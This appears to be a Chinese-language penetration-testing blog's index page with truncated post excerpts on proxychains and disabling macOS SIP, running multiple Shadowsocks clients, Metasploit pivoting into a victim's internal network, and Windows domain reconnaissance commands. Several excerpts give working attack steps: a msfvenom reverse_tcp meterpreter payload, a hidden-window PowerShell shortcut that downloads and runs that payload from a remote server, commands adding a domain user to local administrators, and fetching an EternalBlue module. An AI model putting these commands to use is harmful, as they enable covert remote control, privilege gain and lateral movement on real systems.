proxychains 安装命令: brew install proxychains-ng 原因:使用proxychains4 nmap的时候发现走的并非代理,而执行命令proxychains4 curl ifconfig.io 的时候,获取到的ip地址的确是本地的。无论怎么设置,都无法生效,流量就是不走设置好的socks5代理。 处理方法:关闭mac电脑System Integrity Protection (SIP)系统完整性保护,而在10.11 版本之前是没有的,所以需要关闭。 操作如下: 1.关机 2.开机的时候按住command+R 按钮,进入恢复模式,其实并不是去恢复系统,而是进入恢复界面,找到CMI命令行界面,这个类似windows进入了PE系统,这样子操作就可拥有对系统最大化的修改权,类似在windows下你删除system32 文件,显然是删不了的。但是在PE下就可以,这 […]
Author: 系统自定义
linux下,多个SS同时使用方法
使用场景:在一台电脑上,由于有时候需要使用多个ip,但是其他办法又很麻烦,下面的方法,只需要多开几个CMI(commond interface)小窗口,然后更改一下本地代理的端口就好,使用不同的浏览器代理即可实现多IP使用。 例如: sslocal -s ss的服务器地址 -p ss服务器端口 -k 密码 -b 本地ip -l 本地端口 -m 加密方式 -vv 这样: sslocal -s www.ss.net -p 2418 -k Aq2P3wCww7aC -b 127.0.0.1 -l 1081 -m aes-256-cfb -vv 具体可查看命令 sslocal 详细: >sslocal -help option -e not recognized usage: sslocal [-h] -s SERVER_ADDR [-p SERVER_PORT] [-b LOCAL_ […]
MSF之目标内网代理
利用场景:有时候使用msf拿到meterpreter 反弹了,但是想把机器代理到对方的内网里,任何请求也走对方的内网。此刻需要使用到msf的辅助模块 socks4a(msf也有类似lcx功能模块,名字portfwd ) pivot是meterpreter最常用的一种代理,可以轻松把你的机器代理到受害者内网环境,下面介绍下pivot的搭建和使用方法 使用方法route add 目标i或ip段 Netmask 要使用代理的会话,通过实例来说明: 在metasploit添加一个路由表,目的是访问10.1.1.129将通过meterpreter的会话 1 来访问: msf exploit(handler) > route add xxx.xxx.xxx.xxx 255.255.255.0 1 [*] Route added msf exploit(handler) > ro […]
快捷方式powershell反弹到msf
生成一个msf后门 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 -f psh-reflection > psl.psl 在windows下创建一个快捷方式: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -c “IEX (New-Object Net.WebClient).DownloadString(‘http://xxx.com/psl.psl’);” or msfvenom -p windows/x64/meterpreter/re […]
密码保护:一个可以过狗的sqlmap脚本
内网(域)渗透基本命令
内网(域)渗透–基本命令 ———————————————————————————————————— ipconfig /all —— 查询本机IP段,所在域等 net user —— 本机用户列表 net localhroup administrators —— 本机管理员[通常含有域用户] net user /domain —— 查询域用户 net group /domain —— 查询域里面的工作组 net group “domain admins” /domain —— 查询域管理员用户组 net localgroup administrators /domain —— 登录本机的域管理员 net localgroup administrators workgroup\user001 /add ——域用户添加到本机 ne […]
445端口之Metasploit集成使用
前言:445对坏人而言是个好端口,对好人而言是个坏端口。(小孩子才分好坏么?我想也是) 使用环境:woobuntu(乌云版ubuntu),自带了MSF,不是最新版就sudo msfupdate吧升级一下。 下载msf关于445的漏洞模块: git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git 这里需要说明一下,MSF所有模块都是在相应文件夹里的,所以,可以把clone下来的直接复制到的 /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.14.1/modules/exploits/windows/smb/ 这个目录下,也就是最新的445漏洞到smb目录下。 然后就是vi 修改目录下 […]